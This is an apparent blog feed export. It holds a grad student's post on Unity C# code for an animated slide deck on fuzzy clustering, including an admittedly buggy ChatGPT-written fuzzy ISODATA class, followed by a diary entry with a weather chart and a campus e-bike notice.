    lambda = Math.Round(slider.value, 2);
    lambdaText.text = "λ=" + lambda;
    UpdateUI();
    }
    void UpdateUI()
    {
    for (int i = 0; i < Edges.transform.childCount; i++)
    {
    double temp = double.Parse(Edges.transform.GetChild(i).name.Split(' ')[1]);
    if (temp >= mu && temp >= lambda)
    {
    Edges.transform.GetChild(i).gameObject.SetActive(true);
    }
    else
    Edges.transform.GetChild(i).gameObject.SetActive(false);
    }
    }
    // Update is called once per frame
    void Update()
    {

    }
    }

[screenshot: slide 5]

The Fuzzy K-Means Algorithm

Press the buttons to change the value of L.

I remember puzzling over the front end here for quite a while, because I couldn't come up with a good way to convert between game-space coordinates and the chart's image coordinates.

In the end I wrote a rather crude method for it and didn't use DOTween.

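The iteration that Calc() below runs is standard fuzzy c-means with fuzzifier m = 2 and two clusters: each pass first updates the centers from the squared memberships, then the memberships from the squared Euclidean distances:

$$z_i = \frac{\sum_j u_{ij}^2\, x_j}{\sum_j u_{ij}^2}, \qquad u_{1j} = \frac{1}{1 + d_{1j}^2 / d_{2j}^2}, \quad u_{2j} = \frac{1}{1 + d_{2j}^2 / d_{1j}^2},$$

and the stopping quantity shown on screen is the largest membership change between consecutive iterations, $\max_{i,j} |u_{ij}^{(L)} - u_{ij}^{(L-1)}|$.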
    using DG.Tweening;
    using System;
    using System.Collections;
    using System.Collections.Generic;
    using System.Threading;
    using UnityEngine;
    using UnityEngine.UI;
    using static UnityEngine.UI.Image;

    public class Scene5Controller : MonoBehaviour
    {
    [SerializeField] private GameObject Matrix1;
    [SerializeField] private GameObject Matrix2;
    [SerializeField] private GameObject Matrix3;
    [SerializeField] private Text LText;
    [SerializeField] private Text CondictionText;
    [SerializeField] private Color originColor;
    [SerializeField] private Color matrixColor;
    private int x = 0;
    private int y = 0;

    [SerializeField] private Text U_1_Text;
    [SerializeField] private Text U_Text;
    [SerializeField] private GameObject Z_1GameObject;
    [SerializeField] private GameObject Z_2GameObject;

    private Vector3 Z_1_old_position = Vector3.zero;
    private Vector3 Z_1_new_position = Vector3.zero;
    private Vector3 Z_2_old_position = Vector3.zero;
    private Vector3 Z_2_new_position = Vector3.zero;
    private float timer = 0;

    private int L = 0;
    private double[,] X = new double[4, 2]
    {
    {0, 0 },
    {0, 1 },
    {3, 1 },
    {3, 2 },
    };
    private double[] Z_1 = new double[] { 1.84, 1.84 };
    private double[] Z_2 = new double[] {2.84, 1.84};
    private double[,] U = new double[2, 4]{
    {0.9, 0.8, 0.7, 0.1},
    {0.1, 0.2, 0.3, 0.9},
    };
    private double[,] U_L_1 = new double[2, 4]{
    {0.9, 0.8, 0.7, 0.1},
    {0.1, 0.2, 0.3, 0.9},
    };
    private double[,] U_L = new double[2, 4]{
    {0.9, 0.8, 0.7, 0.1},
    {0.1, 0.2, 0.3, 0.9},
    };
    public void OnIncreseL()
    {
    L += 1;
    if(L == 7)
    {
    L = 1;
    }
    LText.text = "L=" + L;
    Calc();
    UpdateUI();
    }
    public void OnDecreseL()
    {
    L -= 1;
    if (L == 0)
    {
    L = 6;
    }
    LText.text = "L=" + L;
    Calc();
    UpdateUI();
    }
    public void Calc()
    {
    double[,] temp = new double[U.GetLength(0), U.GetLength(1)];
    for (int i = 0; i < U.GetLength(0); i++)
    {
    for (int j = 0; j < U.GetLength(1); j++)
    {
    temp[i, j] = U[i, j];
    }
    }
for (int i = 0; i < L; i++) // repeat the update L times
    {
    // Debug.Log("i=" + i +" ********************");
    for (int k = 0; k < 4; k++)
    {
    U_L_1[0, k] = temp[0, k];
    U_L_1[1, k] = temp[1, k];
    // Debug.Log(Math.Round(U_L_1[0, k], 2) + ", " + Math.Round(U_L_1[1, k], 2));
    }
////////////////// Compute cluster centers Z1 and Z2
double dividend_x_1 = 0; // numerator, x component
double dividend_y_1 = 0; // numerator, y component
double divisor_1 = 0; // denominator

double dividend_x_2 = 0; // numerator, x component
double dividend_y_2 = 0; // numerator, y component
double divisor_2 = 0; // denominator
for (int j = 0; j < 4; j++) // loop over the four samples
{
divisor_1 += temp[0, j] * temp[0, j];
dividend_x_1 += X[j, 0] * temp[0, j] * temp[0, j];
dividend_y_1 += X[j, 1] * temp[0, j] * temp[0, j];

divisor_2 += temp[1, j] * temp[1, j];
dividend_x_2 += X[j, 0] * temp[1, j] * temp[1, j];
dividend_y_2 += X[j, 1] * temp[1, j] * temp[1, j];
}
// Update the cluster centers
Z_1[0] = dividend_x_1 / divisor_1;
Z_1[1] = dividend_y_1 / divisor_1;
Z_2[0] = dividend_x_2 / divisor_2;
Z_2[1] = dividend_y_2 / divisor_2;
    // Debug.Log("迭代次数 " + i + " 聚类中心:(" + Z_1[0] + "," + Z_1[1] + "),(" + Z_2[0] + "," + Z_2[1] + ")");
// Compute squared distances and update the membership matrix
    double d1;
    double d2;
    for (int k = 0; k < 4; k++)
    {
    // Debug.Log("---------------------");
    // Debug.Log("X" + (k + 1) + ": " + X[k, 0] + ", " + X[k, 1]);
    d1 = (X[k, 0] - Z_1[0]) * (X[k, 0] - Z_1[0]) + (X[k, 1] - Z_1[1]) * (X[k, 1] - Z_1[1]);
    d2 = (X[k, 0] - Z_2[0]) * (X[k, 0] - Z_2[0]) + (X[k, 1] - Z_2[1]) * (X[k, 1] - Z_2[1]);
    temp[0, k] = 1 / (1 + d1 / d2);
    temp[1, k] = 1 / (1 + d2 / d1);
    // Debug.Log(Math.Round(temp[0, k], 2) + ", " + Math.Round(temp[1, k], 2));
    }
    }
    // Debug.Log("!!!!!!!!!!!!!!!!");
    for (int k = 0; k < 4; k++)
    {
    U_L[0, k] = temp[0, k];
    U_L[1, k] = temp[1, k];
    // Debug.Log(Math.Round(U_L[0, k], 2) + ", " + Math.Round(U_L[1, k], 2));
    }
    }
    public void UpdateUI()
    {
    Matrix2.transform.Find((x * 4 + y + 1).ToString()).GetComponent<Image>().color = originColor;
    Matrix3.transform.Find((x * 4 + y + 1).ToString()).GetComponent<Image>().color = originColor;
    U_1_Text.text = "U(" + (L - 1).ToString() + ")=";
    U_Text.text = "U(" + L + ")=";

    for (int i = 0; i < 4; i++)
    {
    Matrix2.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U_L_1[0, i], 2).ToString();
    Matrix2.transform.Find((i + 5).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U_L_1[1, i], 2).ToString();
    Matrix3.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U_L[0, i], 2).ToString();
    Matrix3.transform.Find((i + 5).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U_L[1, i], 2).ToString();
    }
    double max = 0;

    for (int i = 0; i < U.GetLength(0); i++)
    {
    for (int j = 0; j < U.GetLength(1); j++)
    {
    if (max < Math.Abs(U_L_1[i, j] - U_L[i, j]))
    {
    max = Math.Abs(U_L_1[i, j] - U_L[i, j]);
    x = i;
    y = j;
    }
    }
    }
    CondictionText.text = Math.Round(max, 6).ToString();

    Matrix2.transform.Find((x * 4 + y + 1).ToString()).GetComponent<Image>().color = matrixColor;
    Matrix3.transform.Find((x * 4 + y + 1).ToString()).GetComponent<Image>().color = matrixColor;

    Z_1_old_position = Z_1GameObject.transform.localPosition;
    Z_2_old_position = Z_2GameObject.transform.localPosition;

    Z_1GameObject.transform.Find("Text").GetComponent<Text>().text = "Z1=(" + Math.Round(Z_1[0], 2) + ", " + Math.Round(Z_1[1],2) + ")T";
    Z_1_new_position = new Vector3((float)(120 * Math.Round(Z_1[0], 2)), (float)(120 * Math.Round(Z_1[1], 2)), 0);
    // Z_1GameObject.transform.localPosition = Z_1_new_position;

    Z_2GameObject.transform.Find("Text").GetComponent<Text>().text = "Z2=(" + Math.Round(Z_2[0], 2) + ", " + Math.Round(Z_2[1],2) + ")T";
    Z_2_new_position = new Vector3((float)(120 * Math.Round(Z_2[0], 2)), (float)(120 * Math.Round(Z_2[1], 2)), 0);
    // Z_2GameObject.transform.localPosition = Z_2_new_position;
    timer = 0.5f;


    }
    // Start is called before the first frame update
    void Start()
    {
    for (int i = 0; i < 4; i++)
    {
    Matrix1.transform.Find((i + 1).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U[0, i], 2).ToString();
    Matrix1.transform.Find((i + 5).ToString()).Find("Text").GetComponent<Text>().text = Math.Round(U[1, i], 2).ToString();
    }
    L = 0;
    Z_1_old_position = Z_1GameObject.transform.localPosition;
    Z_2_old_position = Z_2GameObject.transform.localPosition;
    OnIncreseL();
    }

    // Update is called once per frame
    void Update()
    {
    if (timer > 0)
    {
    timer -= Time.deltaTime;
    Z_1GameObject.transform.localPosition = Z_1_old_position + (Z_1_new_position - Z_1_old_position) * (1 - timer) * (1 - timer);
    Z_2GameObject.transform.localPosition = Z_2_old_position + (Z_2_new_position - Z_2_old_position) * (1 - timer) * (1 - timer);
    }
    }
    }
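
For the record, the Calc() loop above is, as far as I can tell, exactly the fuzzy c-means update with fuzzifier $m=2$, two clusters, and four samples; in the snippet's notation (my reading of the code, not an authoritative derivation):

$$Z_c = \frac{\sum_{j=1}^{4} u_{cj}^{2}\, X_j}{\sum_{j=1}^{4} u_{cj}^{2}}, \qquad u_{1j} = \frac{1}{1 + D_{1j}/D_{2j}}, \qquad u_{2j} = \frac{1}{1 + D_{2j}/D_{1j}}$$

where $u_{cj}$ is the membership of sample $X_j$ in cluster $c$ and $D_{cj}=\lVert X_j - Z_c\rVert^2$ is the squared distance to centre $Z_c$. The membership update is the general FCM rule $u_{cj}=\left(\sum_{r=1}^{2} D_{cj}/D_{rj}\right)^{-1}$, which the two fractions above simply spell out for two clusters.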

6

jpg

Fuzzy ISODATA algorithm

The computation for this one is too heavy, and it is fairly involved; I never really understood it, let alone managed to visualise it…

I had ChatGPT write a Python version. It does run in a Jupyter Notebook, but change the parameters even slightly and it falls over. Then again, 老田 probably doesn't understand it either, so I'll just bluff my way through, hehe.

I copied the earlier code scroll box back in.

    <color="#FF8800">import numpy as np
    </color>

    <color="#00FFFF">class FuzzyISODATA</color>():
    <color="#dcdcaa">def __init__(self, data, k, max_iter, min_samples=1, max_samples=None)</color>:
    self.data = data <color="#57a64a"># 输入的样本数据</color>
    self.k = k <color="#57a64a"># 簇的数量</color>
    self.max_iter = max_iter <color="#57a64a"># 最大迭代次数</color>
    self.min_samples = min_samples <color="#57a64a"># 每个簇的最小样本数</color>
    <color="#57a64a"># 每个簇的最大样本数 max_samples。如果未指定,则默认为样本数据 data 的长度</color>
    self.max_samples = max_samples if max_samples is not None else len(data)
    self.epsilon = 0.01 <color="#57a64a"># 容差阈值</color>
    self.alpha = 0.5 <color="#57a64a"># 簇重心标准偏差的阈值</color>
    self.beta = 0.5 <color="#57a64a"># 样本点从属度的阈值</color>

    self.centroids = None <color="#57a64a"># 簇质心</color>
    self.weights = None <color="#57a64a"># 每个样本点在所有簇中的从属度</color>

    <color="#dcdcaa">def initialize(self)</color>:
    <color="#57a64a"># 从原始数据 self.data 中选取 k 个随机的质心点,保存到 self.centroids 变量中。</color>
    self.centroids = self.data[np.random.choice(len(self.data), self.k, replace=False), :]
    <color="#57a64a"># 初始化权重矩阵 self.weights,大小为 (len(self.data), k),其中每个元素都被初始化为 0</color>
    self.weights = np.zeros((len(self.data), self.k))
    <color="#57a64a"># 对于所有原始数据 self.data 中的向量,为它们随机分配一个初始的权重值</color>
    for i in range(len(self.data)):
    self.weights[i, np.random.randint(self.k)] = 1

    <color="#dcdcaa">def update_weights(self)</color>:
    <color="#57a64a"># 代码通过遍历所有的质心点 j,找到所有分配到第 j 个簇中的数据样本</color>
    for j in range(self.k):
    <color="#57a64a"># 如果该簇中的样本数小于预设的最小值 self.min_samples,</color>
    <color="#57a64a"># 那么就认为该簇没有足够的样本,后面就无法对它进行合并等操作,因此需要把该簇从质心和权重矩阵中删除,并把 self.k 减 1</color>
    samples = self.data[self.weights[:, j] > 0]
    if len(samples) < self.min_samples:
    mask = self.weights[:, j] == 1
    self.weights[mask, :] = np.delete(self.weights[mask, :], j, axis=1)
    self.centroids = np.delete(self.centroids, j, axis=0)
    self.k -= 1
    continue
    <color="#57a64a"># 对于有足够样本的簇,算法会根据该簇中所有样本与该簇的质心点 j 之间的距离计算出一个标准差 std_dev,</color>
    <color="#57a64a"># 并将除标准差以外的部分规范化为一个权重值,用于表示该样本属于该簇的程度</color>
    <color="#57a64a"># 首先计算所有样本到 j 号质心的欧几里得距离 dist</color>
    dist = np.linalg.norm(samples - self.centroids[j], axis=1)
    <color="#57a64a"># 求出这些距离的平均值 mean_dist 和标准差 std_dev</color>
    mean_dist = np.mean(dist)
    <color="#57a64a"># 利用高斯分布函数将距离 dist 转换为一个 0~1 之间的权重值,用于表示该样本属于这个簇的程度</color>
    std_dev = np.sqrt(np.mean((dist - mean_dist) ** 2))

    mask = self.weights[:, j] > 0
    <color="#57a64a"># 根据计算出来的权重更新 self.weights 矩阵中的对应位置,即将 self.weights[i, j] 赋值为上面计算出来的权重值</color>
    self.weights[mask, j] = np.exp(-((dist - mean_dist) ** 2) / (2 * std_dev ** 2))

    <color="#dcdcaa">def update_centroids(self)</color>:
    <color="#57a64a"># 遍历所有质心点 j,并根据每个簇的权重信息,重新计算第 j 个簇的质心坐标</color>
    for j in range(self.k):
    <color="#57a64a"># 通过对 self.weights 矩阵进行逻辑判断,</color>
    <color="#57a64a"># 筛选出所有满足 self.weights[:, j] > 0 条件的索引,即所有已经被分配到第 j 个簇的数据样本</color>
    mask = self.weights[:, j] > 0
    <color="#57a64a"># 使用 np.mean() 方法在这些样本上分别计算出每个维度上的均值,作为该簇新的质心坐标</color>
    self.centroids[j] = np.mean(self.data[mask], axis=0)

    <color="#dcdcaa">def update_k(self)</color>:
    <color="#57a64a"># 判断样本数据量是否超过了 self.max_samples,如果没有超过就直接返回,不做任何处理</color>
    if len(self.data) <= self.max_samples:
    return
    <color="#57a64a"># 样本数据量超过 self.max_samples 时,算法会计算所有质心点中每个维度的标准差,</color>
    <color="#57a64a"># 并筛选出其中标准差大于 self.epsilon 的质心点,即待进行拆分操作的质心点。</color>
    <color="#57a64a"># 这通过对 self.centroids 中每个质心点在各个维度上的标准差进行计算,</color>
    <color="#57a64a"># 并使用 np.where() 方法筛选出标准差大于 self.epsilon 的质心点来实现。</color>
    centroids_to_split = np.where(np.std(self.centroids, axis=1) > self.epsilon)[0]

    <color="#57a64a"># 对于每个待拆分的质心点 i</color>
    for i in centroids_to_split:
    <color="#57a64a"># 算法会在该质心点的位置插入一个新的质心点 i+1。</color>
    <color="#57a64a"># 具体地,代码使用新质心点的计算公式,即当前质心坐标加上一个随机扰动,生成一个新的质心坐标</color>
    new_centroid = self.centroids[i] + self.alpha * np.std(self.data, axis=0)[i] * np.random.randn(len(self.data[0]))
    <color="#57a64a"># 使用 np.insert() 方法将这个新的质心坐标插入到 self.centroids 数组中第 i+1 个位置</color>
    self.centroids = np.insert(self.centroids, i + 1, new_centroid, axis=0)

    <color="#57a64a"># 根据每个簇的权重信息,对新拆分出来的簇进行样本分配</color>
    <color="#57a64a"># 对于拆分出来的两个簇 i 和 i+1,算法会将原来被分配到第 i 个簇中的数据样本重新分配到距离它更近的质心中</color>
    mask = self.weights[:, i] > 0
    <color="#57a64a"># 对 self.weights 矩阵中被分配到第 i 个簇中的样本进行筛选</color>
    self.weights[mask, i] = self.beta
    <color="#57a64a"># 将它们的权重值从原来的 self.beta 修改为 1 - self.beta(即从属度由原来的较弱变为较强),</color>
    <color="#57a64a"># 同时将它们的权重值从第 i+1 个簇中原来的 0 修改为 1 - self.beta</color>
    self.weights[mask, i+1] = 1 - self.beta

    <color="#57a64a"># 将簇的数量 self.k 加一,表示新拆分出来的簇已经被计入簇的总数中</color>
    self.k += 1

    <color="#dcdcaa">def fit(self)</color>:
    self.initialize()

    for i in range(self.max_iter):
    self.update_weights()
    self.update_centroids()
    self.update_k()

    <color="#dcdcaa">def predict(self, data)</color>:
    <color="#57a64a"># 输入一组新的数据样本 data,算法会计算出这些样本点与所有质心点之间的距离,</color>
    <color="#57a64a"># 并对每个簇的权重进行计算。最终,算法会将所有数据样本分配到权重最大的簇中</color>
    weights = np.zeros((len(data), self.k))
    for j in range(self.k):
    <color="#57a64a"># 使用 np.linalg.norm() 方法计算 data 与第 j 个质心点的欧几里得距离</color>
    dist = np.linalg.norm(data - self.centroids[j], axis=1)
    <color="#57a64a"># 使用 np.mean() 方法计算所有样本点与该质心点之间的平均距离 mean_dist</color>
    mean_dist = np.mean(dist)
    <color="#57a64a"># 计算样本点与平均距离之间的标准差 std_dev</color>
    std_dev = np.sqrt(np.mean((dist - mean_dist) ** 2))
    <color="#57a64a"># 使用高斯核函数(Gaussian Kernel)计算每个样本分别属于第 j 个簇的概率</color>
    weights[:, j] = np.exp(-((dist - mean_dist) ** 2) / (2 * std_dev ** 2))

    <color="#57a64a"># 算法选取每个样本点分别属于哪个簇的权重值最大,即使用 argmax() 方法在 weights 矩阵的第二个轴上取最大值所在的索引</color>
    return weights.argmax(axis=1)

    <color="#FF8800">import matplotlib.pyplot as plt</color>
    <color="#FF8800">from sklearn.datasets import make_blobs</color>

    <color="#57a64a"># 生成一些随机的数据点</color>
    data, _ = make_blobs(n_samples=1000, centers=3, n_features=2, random_state=42)

    <color="#57a64a"># 使用模糊 ISODATA 算法聚类数据</color>
    fisodata = FuzzyISODATA(data, k=3, max_iter=20)
    fisodata.fit()
    labels = fisodata.predict(data)

    <color="#57a64a"># 将聚类结果可视化</color>
    plt.scatter(data[:, 0], data[:, 1], c=labels)
    plt.show()
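
A guess at why tiny parameter changes break it (my hypothesis, not verified): update_weights() deletes clusters while iterating over range(self.k), so the index j can outrun the shrunken arrays; update_k() indexes the per-feature standard deviation with a centroid index; and std_dev can be exactly zero for a degenerate cluster, making the Gaussian weight divide by zero. A minimal guard for that last problem, as a sketch:

std_dev = max(np.sqrt(np.mean((dist - mean_dist) ** 2)), 1e-8)  # floor std_dev so the Gaussian weight cannot divide by zero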

7

jpg

SynthText3D

png

The layout is text on the left, image on the right. Colour scheme:

• Background: #312E2B
• Text:
  • Green: #92E86C
  • Red: #FF8080
  • Cyan: #00FFFF

I wrote some logic to swap the mouse cursor, but after building it had no effect. Dead!

using UnityEngine;

public class ChangeCursor : MonoBehaviour
{
    public Texture2D cursorTexture;

    // Start is called before the first frame update
    void Start()
    {
        Cursor.SetCursor(cursorTexture, Vector2.zero, CursorMode.Auto);
    }
}

png

How things are placed in the Hierarchy and the Project. The slide indices on the left are consecutive; the ones on the right are not, so each right-hand GameObject carries a SceneID component to tie it to the left side.

using UnityEngine;

public class SceneID : MonoBehaviour
{
    public int ID = 0;
}

I wrote a ScenesController class to handle page turning.

• Pressing Left/A pages backwards, calling previousScene()
• Pressing Right/D pages forwards, calling nextScene()
• playAnimation() drives the page-turn animation, using the DOTween plugin.
using System.Collections;
using System.Collections.Generic;
using Unity.VisualScripting;
using UnityEngine;
using UnityEngine.UI;
using DG.Tweening;

public class ScenesController : MonoBehaviour
{
    [SerializeField] private Transform leftScenesParent;
    private List<Transform> leftScenes = new List<Transform>();
    [SerializeField] private Transform rightScenesParent;
    private List<Transform> rightScenes = new List<Transform>();

    private int currentRightScene = 0;
    private int oldRightScene = 0;
    private int currentLeftScene = 0;
    private int oldLeftScene = 0;
    [SerializeField] private Text sceneIndexUI;
    private bool allowChange = true;

    // Start is called before the first frame update
    void Start()
    {
        // Park every slide 1440 units off-screen, then show the first one.
        for (int i = 0; i < leftScenesParent.childCount; i++)
        {
            leftScenes.Add(leftScenesParent.GetChild(i));
            leftScenes[i].localPosition = new Vector3(0, -1440, 0);
        }
        for (int i = 0; i < rightScenesParent.childCount; i++)
        {
            rightScenes.Add(rightScenesParent.GetChild(i));
            rightScenes[i].localPosition = new Vector3(0, 1440, 0);
        }
        leftScenes[0].localPosition = Vector3.zero;
        rightScenes[0].localPosition = Vector3.zero;

        sceneIndexUI.text = (currentLeftScene + 1) + "/" + leftScenes.Count;
    }

    // Update is called once per frame
    void Update()
    {
        if (Input.GetKeyDown(KeyCode.LeftArrow) || Input.GetKeyDown(KeyCode.A))
        {
            previousScene();
        }
        if (Input.GetKeyDown(KeyCode.RightArrow) || Input.GetKeyDown(KeyCode.D))
        {
            nextScene();
        }
    }

    private void previousScene()
    {
        if (allowChange)
        {
            allowChange = false;
            Debug.Log("previousScene()");
            oldLeftScene = currentLeftScene;
            // Wrap around from the first slide to the last.
            if (currentLeftScene == 0)
                currentLeftScene = leftScenes.Count - 1;
            else
                currentLeftScene -= 1;
            sceneIndexUI.text = (currentLeftScene + 1) + "/" + leftScenes.Count;

            playAnimation();
        }
    }

    private void nextScene()
    {
        if (allowChange)
        {
            allowChange = false;
            Debug.Log("nextScene()");
            oldLeftScene = currentLeftScene;
            currentLeftScene = (currentLeftScene + 1) % leftScenes.Count;
            sceneIndexUI.text = (currentLeftScene + 1) + "/" + leftScenes.Count;

            playAnimation();
        }
    }

    private void playAnimation()
    {
        // Find the right-hand scene whose SceneID covers the current left slide.
        oldRightScene = currentRightScene;
        if (rightScenes[rightScenes.Count - 1].GetComponent<SceneID>().ID <= currentLeftScene)
        {
            currentRightScene = rightScenes.Count - 1;
        }
        else
        {
            for (int i = 0; i < rightScenes.Count - 1; i++)
            {
                if (rightScenes[i].GetComponent<SceneID>().ID <= currentLeftScene && rightScenes[i + 1].GetComponent<SceneID>().ID > currentLeftScene)
                {
                    currentRightScene = i;
                }
            }
        }

        // Slide the outgoing panels off-screen; the direction depends on
        // whether we page forwards or backwards.
        Tweener tweenerLeftOut = null;
        Tweener tweenerRightOut = null;
        if (oldLeftScene > currentLeftScene)
        {
            tweenerLeftOut = leftScenes[oldLeftScene].DOLocalMoveY(-1440, 1);
        }
        else
        {
            tweenerLeftOut = leftScenes[oldLeftScene].DOLocalMoveY(1440, 1);
        }
        if (oldRightScene > currentRightScene)
        {
            tweenerRightOut = rightScenes[oldRightScene].DOLocalMoveY(1440, 1);
        }
        else if (oldRightScene < currentRightScene)
        {
            tweenerRightOut = rightScenes[oldRightScene].DOLocalMoveY(-1440, 1);
        }

        // Slide the incoming panels to the centre.
        leftScenes[currentLeftScene].gameObject.SetActive(true);
        rightScenes[currentRightScene].gameObject.SetActive(true);
        Tweener tweenerLeftIn = leftScenes[currentLeftScene].DOLocalMoveY(0, 1);
        Tweener tweenerRightIn = null;
        if (currentRightScene != oldRightScene)
        {
            tweenerRightIn = rightScenes[currentRightScene].DOLocalMoveY(0, 1);
        }
        Debug.Log("currentRightScene: " + currentRightScene + " oldRightScene: " + oldRightScene + " currentLeftScene: " + currentLeftScene + " oldLeftScene: " + oldLeftScene);
        // Once the move finishes, park all other slides off-screen again
        // and accept input for the next page turn.
        tweenerLeftIn.OnComplete(() =>
        {
            for (int i = 0; i < leftScenes.Count; i++)
            {
                if (i > currentLeftScene)
                {
                    leftScenes[i].localPosition = new Vector3(0, -1440, 0);
                    leftScenes[i].gameObject.SetActive(false);
                }
                else if (i < currentLeftScene)
                {
                    leftScenes[i].localPosition = new Vector3(0, 1440, 0);
                    leftScenes[i].gameObject.SetActive(false);
                }
            }
            allowChange = true;
        });
    }
}

The animation code for revealing pictures one after another; I believe this one ended up scrapped.

using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.UI;
using DG.Tweening;

public class ShowPictures : MonoBehaviour
{
    [SerializeField] private Transform imagesParent;
    private List<Image> images = new List<Image>();

    // Start is called before the first frame update
    void Start()
    {
        // Collect the child images and make them fully transparent.
        for (int i = 0; i < imagesParent.childCount; i++)
        {
            images.Add(imagesParent.GetChild(i).GetComponent<Image>());
            images[i].color = new Color(images[i].color[0], images[i].color[1], images[i].color[2], 0);
        }
        showPictures(0);
    }

    // Fade the images in one by one, each fade chaining the next.
    private void showPictures(int i)
    {
        if (i < images.Count)
        {
            Tweener tweener = images[i].DOFade(1, 0.5f);
            tweener.OnComplete(() => showPictures(i + 1));
        }
    }
}

The classic hue-cycling animation code for the 伟哥 tribute:

using UnityEngine;
using UnityEngine.UI;
using DG.Tweening;

public class ChangeColor : MonoBehaviour
{
    [SerializeField] private bool isImage = true;
    private Image image;
    private Text text;

    // Start is called before the first frame update
    void Start()
    {
        if (isImage)
        {
            image = GetComponent<Image>();
            float H, S, V;
            Color.RGBToHSV(image.color, out H, out S, out V);
            changeColor(H, S, V);
        }
        else
        {
            text = GetComponent<Text>();
            float H, S, V;
            Color.RGBToHSV(text.color, out H, out S, out V);
            changeColor(H, S, V);
        }
    }

    private void changeColor(float H, float S, float V)
    {
        // Step the hue forward and wrap it back to 0 past 1.
        float newH = H + 0.01f;
        if (newH > 1)
        {
            newH = 0;
        }
        Tweener tweener = null;
        // Convert the HSV colour back to RGB and tween towards it.
        if (isImage)
        {
            tweener = image.DOColor(Color.HSVToRGB(newH, S, V), 0.05f);
        }
        else
        {
            tweener = text.DOColor(Color.HSVToRGB(newH, S, V), 0.05f);
        }
        // Chain the next hue step once this tween finishes.
        tweener.OnComplete(() => changeColor(newH, S, V));
    }
}

There was also a feature where pressing a button played a Hokkien "happy birthday, 伟哥" clip, but for some reason it refused to trigger during the presentation…

using UnityEngine;
using UnityEngine.UI;

public class PlaySounds : MonoBehaviour
{
    public AudioClip soundClip;
    private AudioSource audioSource;

    private void Start()
    {
        // Grab the AudioSource attached to the button.
        audioSource = GetComponent<AudioSource>();
        if (audioSource == null)
        {
            // If the button has no AudioSource, add one.
            audioSource = gameObject.AddComponent<AudioSource>();
        }

        // Assign the audio clip to the AudioSource.
        audioSource.clip = soundClip;

        // Make sure the button has a click handler, registering PlaySound() as the response.
        Button button = GetComponent<Button>();
        button.onClick.AddListener(PlaySound);
    }

    // Plays the sound.
    private void PlaySound()
    {
        Debug.Log("Play Sound!");
        audioSource.Play();
    }
}

    ]]>
@@ -5040,7 +5040,7 @@ /posts/Diary-1-%E6%A2%A7%E6%A1%90%E4%B8%8E%E9%93%B6%E6%9D%8F/ - Preface

The first semester of my second year of grad school has begun!

This post is a running log of life after arriving back at 冀大 on 9.3!

The past two weeks in a nutshell:

How have things been
In the lab every day
Thoroughly bored
Fine, fine

Baoding weather report:

import matplotlib.pyplot as plt
import seaborn as sns
from datetime import datetime, timedelta

# Use Seaborn's darkgrid style.
sns.set_style("darkgrid")

# Dates for the x axis.
x = []
for i in range(14):
    x.append(datetime(2023, 9, 4) + timedelta(days=i))

# y-axis data (temperatures and PM values).
y1 = [20, 22, 21, 21, 22, 20, 19, 18, 14, 15, 14, 17, 19, 19]  # daily low
y2 = [32, 32, 32, 33, 31, 26, 27, 28, 26, 28, 29, 29, 30, 31]  # daily high
y3 = [89, 90, 107, 91, 80, 35, 39, 50, 37, 38, 50, 59, 93, 63]  # daily PM value

# Create the figure and the first axis.
fig, ax1 = plt.subplots()

# First y axis: temperature.
ax1.plot(x, y1, label='Min Temperature', color='tab:blue')
ax1.plot(x, y2, label='Max Temperature', color='tab:red')
ax1.set_xlabel('Date')
ax1.set_ylabel('Temperature (°C)')
ax1.tick_params(axis='y')

# Second axis sharing the x axis.
ax2 = ax1.twinx()
# Format the x tick labels, keeping only the day of month.
formatted_dates = [date.strftime('%d') for date in x]

# Set the x ticks and labels.
ax1.set_xticks(x)
ax1.set_xticklabels(formatted_dates)

# Second y axis: PM value.
ax2.plot(x, y3, label='PM Value', color='tab:green')
ax2.set_ylabel('PM Value')
ax2.tick_params(axis='y')

# Annotate every data point.
for i, val in enumerate(y1):
    ax1.annotate(str(val) + '°C', xy=(x[i], y1[i]), textcoords='offset points', xytext=(0, 10), ha='center')

for i, val in enumerate(y2):
    ax1.annotate(str(val) + '°C', xy=(x[i], y2[i]), textcoords='offset points', xytext=(0, 10), ha='center')

for i, val in enumerate(y3):
    ax2.annotate(str(val), xy=(x[i], y3[i]), textcoords='offset points', xytext=(0, -15), ha='center')

# Legend.
lines = ax1.get_lines() + ax2.get_lines()
plt.legend(lines, [line.get_label() for line in lines], loc='lower left')

# Title.
plt.title('Temperature and PM Value')

# Show the chart.
plt.show()

png


The parasol tree and the ginkgo:

jpg

Main text

9.3

After dumping my smelly clothes and bedding into the washing machine, I decided to go and scrounge up something to eat.

Weibo says a luckin coffee has opened at 冀大.

jpg

luckin coffee

保罗 recommended it a while back: you can claim a ¥9.9 coffee coupon every week, and one cup a week is not bad at all.


Notice on Regulating the Management of Campus Electric Bicycles

To regulate the management of electric bicycles on campus, eliminate their safety hazards, and safeguard the lives and property of faculty and students as well as good campus order, in accordance with the relevant laws and regulations and the Interim Measures of 冀大 for the Management of Campus Electric Bicycles, it has been decided to place electric bicycles under regulated management from September 4, 2023. The relevant matters are hereby announced as follows:

1. Riders of electric bicycles shall strictly observe the Road Traffic Safety Law of the People's Republic of China, the Fire Protection Law of the People's Republic of China, the Ministry of Public Security's Notice on Regulating Electric Bicycle Parking and Charging and Strengthening Fire Prevention, the Hebei Province Regulations on Electric Bicycle Administration, the Hebei Provincial Public Security Department's Notice on Strengthening the Fire Safety Management of Electric Bicycles, and other relevant laws and regulations; ride and park safely and properly; and eliminate fire and traffic safety hazards of their own accord.

2. Electric bicycles belonging to campus personnel must be registered and licensed with the local public security traffic administration; unlicensed electric bicycles may not enter campus. All compliant electric bicycles shall be registered and filed with the Security Office as required by the Interim Measures of 冀大 for the Management of Campus Electric Bicycles and managed accordingly.

3. Electric bicycles used for policing, engineering, maintenance and repair, logistics support, and similar work must be filed with the Security Office in advance by the unit concerned.

4. Riders must wear a helmet when entering campus, ride slowly once inside, and park in an orderly fashion in the designated areas. Haphazard parking is strictly prohibited; fire lanes must not be occupied and normal traffic must not be obstructed. A first violation of the riding or parking rules draws criticism, education, and a record; more than three violations lead to temporary impoundment of the vehicle and notification of the violator's unit.

